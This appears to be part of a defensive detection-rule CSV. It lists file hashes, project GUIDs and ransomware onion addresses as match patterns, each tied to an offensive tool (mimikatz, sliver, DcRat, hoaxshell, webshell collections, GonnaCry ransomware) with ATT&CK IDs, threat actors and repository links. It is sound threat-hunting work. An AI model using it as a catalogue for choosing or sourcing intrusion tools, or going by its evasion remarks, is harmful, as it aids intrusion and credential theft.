"*6d755e74fb426af04016752db3be2c0c17aad722173e96f5797648c1ceda2cf3*",".{0,1000}6d755e74fb426af04016752db3be2c0c17aad722173e96f5797648c1ceda2cf3.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28550"
"*6d820b495719031338017f6138fae3546f549e9e816274554f6c21a77149b778*",".{0,1000}6d820b495719031338017f6138fae3546f549e9e816274554f6c21a77149b778.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#filehash","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","28553"
"*6d83e7f5c378f8596963e4efbfa9a8b39d183ad21134f8c7dad81ef40c7be9eb*",".{0,1000}6d83e7f5c378f8596963e4efbfa9a8b39d183ad21134f8c7dad81ef40c7be9eb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28554"
"*6d878963a9bc68106e1a6bfdbde3e2d72445d86e65c1613cd07344104c0995c2*",".{0,1000}6d878963a9bc68106e1a6bfdbde3e2d72445d86e65c1613cd07344104c0995c2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28555"
"*6d8bb861a501aecaf9ebf95433d31001fcd529a644be5438c6de49b3afc9d87b*",".{0,1000}6d8bb861a501aecaf9ebf95433d31001fcd529a644be5438c6de49b3afc9d87b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28556"
"*6d93cc6c0eebf09311c01439395e8f02def87ffe8b4abf010ff5f8f18603f96c*",".{0,1000}6d93cc6c0eebf09311c01439395e8f02def87ffe8b4abf010ff5f8f18603f96c.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","28557"
"*6d955490b7ccb6ef77222ec41f494c186050fd9b6b022451ab8ec48104d79673*",".{0,1000}6d955490b7ccb6ef77222ec41f494c186050fd9b6b022451ab8ec48104d79673.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28559"
"*6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171*",".{0,1000}6d96904c0085f49b27a47e4d75542fe8d28b6de9431038d72fdfdb2f51e43171.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","28560"
"*6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183*",".{0,1000}6d97644d0cc23ec724b2f6ec91ac273eedefd5d7f2c20b7b913b4e9ff582b183.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28561"
"*6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3*",".{0,1000}6da016cefca0a050afb4c3dbf5e07f1af4fe69b24f1be45e56444fef537fd2b3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28564"
"*6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e*",".{0,1000}6da346eecac1a1bb11f834be0ef0b08539fb0f9ec7d8cc415ae9e301f53a536e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28566"
"*6dc00f1acf40361ca3eacdab7447097f1e3cd5ddb493e8d42f56d61d5f6c6efc*",".{0,1000}6dc00f1acf40361ca3eacdab7447097f1e3cd5ddb493e8d42f56d61d5f6c6efc.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28570"
"*6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf*",".{0,1000}6dcf39d63a055602fdd1747fe84392641926ec16ed9aae3c136d2915ad83bdcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28572"
"*6dcf6d012c1eeb396082ea834f963cd8740babc71d3fd7114664d76dd5975d9c*",".{0,1000}6dcf6d012c1eeb396082ea834f963cd8740babc71d3fd7114664d76dd5975d9c.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28573"
"*6DD22880-DAC5-4B4D-9C91-8C35CC7B8180*",".{0,1000}6DD22880\-DAC5\-4B4D\-9C91\-8C35CC7B8180.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28574"
"*6dd3dfa923bbabf3c493ef9fc309f3dba682eb2a7d0c2f5e7bbd069a36204d04*",".{0,1000}6dd3dfa923bbabf3c493ef9fc309f3dba682eb2a7d0c2f5e7bbd069a36204d04.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28575"
"*6dd8dd402142c1671bc971aaa32cdf724daf86ec635b24b7f7f2977da7b349f7*",".{0,1000}6dd8dd402142c1671bc971aaa32cdf724daf86ec635b24b7f7f2977da7b349f7.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","28576"
"*6DE0DE7E-A81D-4194-B36A-3E67283FCABE*",".{0,1000}6DE0DE7E\-A81D\-4194\-B36A\-3E67283FCABE.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","28578"
"*6de3b230db2fe85c44a7250e0f9882599ec706d0e360ccad805f311d0e1fbc14*",".{0,1000}6de3b230db2fe85c44a7250e0f9882599ec706d0e360ccad805f311d0e1fbc14.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28580"
"*6df4c790fd104f1a9e2e68cf8411c39280df7c4b1f2ada6ab1836546645d6865*",".{0,1000}6df4c790fd104f1a9e2e68cf8411c39280df7c4b1f2ada6ab1836546645d6865.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","28582"
"*6dfbe4a35f1c89c0be4f6c10d9e9ada69d75095c66dda39445f38e1522b5f1c1*",".{0,1000}6dfbe4a35f1c89c0be4f6c10d9e9ada69d75095c66dda39445f38e1522b5f1c1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","28585"
"*6dtxgqam4crv6rr6.onion*",".{0,1000}6dtxgqam4crv6rr6\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28586"
"*6dtxgqam4crv6rr6.onion.cab*",".{0,1000}6dtxgqam4crv6rr6\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28587"
"*6dtxgqam4crv6rr6.onion.link*",".{0,1000}6dtxgqam4crv6rr6\.onion\.link.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28588"
"*6dtxgqam4crv6rr6.onion.to*",".{0,1000}6dtxgqam4crv6rr6\.onion\.to.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28589"
"*6dtxgqam4crv6rr6.tor2web.org*",".{0,1000}6dtxgqam4crv6rr6\.tor2web\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","28590"
"*6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329*",".{0,1000}6e0055eba5cf62d9ac7b129e55d3f230fef2dd432d88313ae08d85d9ff5c2329.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","28591"
"*6e058a47fb0c4d8d6aa409451c6d5491999caee95ae7a3e50ead61d8425272ba*",".{0,1000}6e058a47fb0c4d8d6aa409451c6d5491999caee95ae7a3e50ead61d8425272ba.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","28592"
"*6e0737510e4601410e0312c6d1f8d3d98c79536952abc4fab0df75f490ec7f78*",".{0,1000}6e0737510e4601410e0312c6d1f8d3d98c79536952abc4fab0df75f490ec7f78.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28593"
"*6e08212071f8b95216a56d0a5edef8fbf23cd33f212762a236060c486f9319d0*",".{0,1000}6e08212071f8b95216a56d0a5edef8fbf23cd33f212762a236060c486f9319d0.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","28594"
"*6E0D8D5C-7B88-4C77-A347-34F8B0FD2D75*",".{0,1000}6E0D8D5C\-7B88\-4C77\-A347\-34F8B0FD2D75.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28595"
"*6e11cfde1949b9171ce570ae5e3b8a7840f12f8f24781c2b3ac37d88627d82ba*",".{0,1000}6e11cfde1949b9171ce570ae5e3b8a7840f12f8f24781c2b3ac37d88627d82ba.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28596"
"*6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3*",".{0,1000}6e142c61b60e8590454a4ce20a8190bf07119ad5843457c9a46205ebea284fb3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28598"
"*6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6*",".{0,1000}6e1611b4524f7426cbd8d7351b269a1239ee710e575e9e460fce110c35962de6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28599"
"*6e1a521508f6fe6ebccc04a17b5976aff8e68f49dd281edada1f68f109116d52*",".{0,1000}6e1a521508f6fe6ebccc04a17b5976aff8e68f49dd281edada1f68f109116d52.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","28600"
"*6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186*",".{0,1000}6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28602"
"*6E25C93C-0985-4D6E-A4C3-89D10F4F4F5F*",".{0,1000}6E25C93C\-0985\-4D6E\-A4C3\-89D10F4F4F5F.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","28603"
"*6E383DE4-DE89-4247-A41A-79DB1DC03AAA*",".{0,1000}6E383DE4\-DE89\-4247\-A41A\-79DB1DC03AAA.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#GUIDproject","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","28606"
"*6e50021a61b3fb16c39a89ae4e7a5c183c2d85012597911f3f405f62bb94026e*",".{0,1000}6e50021a61b3fb16c39a89ae4e7a5c183c2d85012597911f3f405f62bb94026e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28609"
"*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*",".{0,1000}6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","28611"
"*6e5529790d78959b5356c5ad366a91d5d5662267ac1e78eeb33498557efc90a6*",".{0,1000}6e5529790d78959b5356c5ad366a91d5d5662267ac1e78eeb33498557efc90a6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28612"
"*6e5cbf14240bc5d146d5516257163145cba176066d6c43d55d757101c2517587*",".{0,1000}6e5cbf14240bc5d146d5516257163145cba176066d6c43d55d757101c2517587.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","28613"
"*6e6f927544ef90a50ee0fc7de48b67a84ab3081ddac08a4872ba922e718be330*",".{0,1000}6e6f927544ef90a50ee0fc7de48b67a84ab3081ddac08a4872ba922e718be330.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","28615"
"*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*",".{0,1000}6e7645c4\-32c5\-4fe3\-aabf\-e94c2f4370e7.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","#GUIDproject","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","28616"
